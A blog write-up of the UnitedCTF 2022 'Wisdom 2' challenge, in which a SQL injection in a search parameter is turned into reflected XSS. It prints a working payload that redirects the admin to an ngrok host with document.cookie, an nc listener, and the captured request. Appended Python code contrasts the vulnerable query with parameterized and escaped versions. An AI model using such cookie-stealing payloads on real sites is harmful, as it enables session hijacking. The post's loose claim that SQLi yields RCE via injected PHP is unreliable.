H3dg3h0g's Blog

    Wisdom 2

    Challenge

    This is the continuation of Wisdom 1.

    Solution

    In Wisdom 1 we found a SQL injection in the website’s main page. Now let’s take a look at the second page.

The second page asks for a URL which the admin will take a look at:


If you have done CTFs before, you know that this is a classic XSS challenge, so we need to find a way to get an XSS on this website.

    Taking another look back at the first page, I noticed that the query was sent through a GET request, meaning the query was in the URL:


After a little bit of googling I learnt that you can leverage a SQL injection into an RCE by adding PHP code inside your SELECT statement so that it gets added to the page!

Sadly, the PHP code kept getting sanitized by the backend, even after trying all the weird sanitization evasion techniques I knew, but it was still worth trying to inject JavaScript instead:

    ' AND FALSE UNION SELECT "a", "<script>alert()</script>" FROM quotes; -- -

And it worked!

    Finally, using ngrok, I could get the admin’s cookie which contained the flag:

    nc -lnvp 8000
    Listening for incoming connections with nc
    sudo ngrok http 8000
    Starting ngrok
    ' AND FALSE UNION SELECT "a", "<script type='text/javascript'>document.location='https://a3ca-132-203-167-165.ngrok.io/?c='+document.cookie;</script>" FROM quotes; -- -
    Full SQLi payload that redirects the user to my ngrok link and appends the cookies

    The final link looks like:

    http://wisdom.ctf.unitedctf.ca?q=' AND FALSE UNION SELECT "a"%2C "<script>document.location%3D'https%3A%2F%2F027f-74-57-165-14.ngrok.io%2F%3Fc%3D'%2Bdocument.cookie%3B<%2Fscript>" FROM quotes%3B -- -

    Submitting the link to the admin
Received the flag!

This was a great web challenge, mainly because I learnt that you can leverage a SQLi into an RCE by injecting PHP into the page. This wasn't the point of this challenge, but it was still a very cool chain of exploits!
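As an added example (not code from the post or from the challenge itself), here is a Python stand-in for the search page that reproduces the chain above against an in-memory SQLite copy of the quotes table, then shows the fixes the flag text points at: a bound parameter instead of string concatenation, output escaping, an HttpOnly session cookie and a CSP without 'unsafe-inline'. The column names, the seed quotes and the session id are assumptions; only the payload and the table name come from the page.

```python
import html
import sqlite3

# Constructed stand-in for the challenge's quotes table; the real column
# names are not on the page, only that the UNION needs two columns.
SEED = [("Socrates", "Wisdom begins in wonder."),
        ("Lao Tzu", "Knowing others is intelligence.")]

# The injection string from the post: closes the LIKE literal, UNIONs a
# script tag into the second column and comments out the rest of the query.
PAYLOAD = ("' AND FALSE UNION SELECT \"a\", "
           "\"<script>alert()</script>\" FROM quotes; -- -")


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE quotes (author TEXT, quote TEXT)")
    conn.executemany("INSERT INTO quotes VALUES (?, ?)", SEED)
    return conn


def render_vulnerable(q):
    """String-built query and unescaped output: the bug class in the post."""
    sql = f"SELECT author, quote FROM quotes WHERE quote LIKE '%{q}%'"
    rows = _db().execute(sql).fetchall()
    return "".join(f"<li>{a}: {t}</li>" for a, t in rows)


def render_fixed(q):
    """Bound parameter keeps q as data (no UNION possible); html.escape
    neutralises any markup that reaches the template from the database."""
    sql = "SELECT author, quote FROM quotes WHERE quote LIKE ?"
    rows = _db().execute(sql, (f"%{q}%",)).fetchall()
    return "".join(f"<li>{html.escape(a)}: {html.escape(t)}</li>"
                   for a, t in rows)


def session_headers(session_id):
    """Response headers the flag text points at: HttpOnly hides the cookie
    from document.cookie, and a CSP without 'unsafe-inline' refuses to run
    an inline <script> even if one does land in the HTML."""
    return {
        "Set-Cookie": f"session={session_id}; HttpOnly; Secure; SameSite=Lax",
        "Content-Security-Policy":
            "default-src 'self'; script-src 'self'; object-src 'none'",
    }
```

Running the page's payload through render_vulnerable yields a list item carrying the script tag, while render_fixed treats the whole string as a search term and returns nothing.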

    ┌─[h3dg3h0g@parrotOS]─[~/Desktop/CTF/UnitedCTF2022/Wisdom 2]
    └──╼ $nc -lnvp 8000
    listening on [any] 8000 ...
    connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 35128
    GET /?c=flag=FLAG-us3_http_0nly_c0ok13s_4nd_3nf0rc3_csp! HTTP/1.1
    Host: 027f-74-57-165-14.ngrok.io
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/106.0.5249.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate, br
    Referer: http://wisdom.ctf.unitedctf.ca/
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Upgrade-Insecure-Requests: 1
    X-Forwarded-For: 2600:1900:2000:a5::1a
    X-Forwarded-Proto: https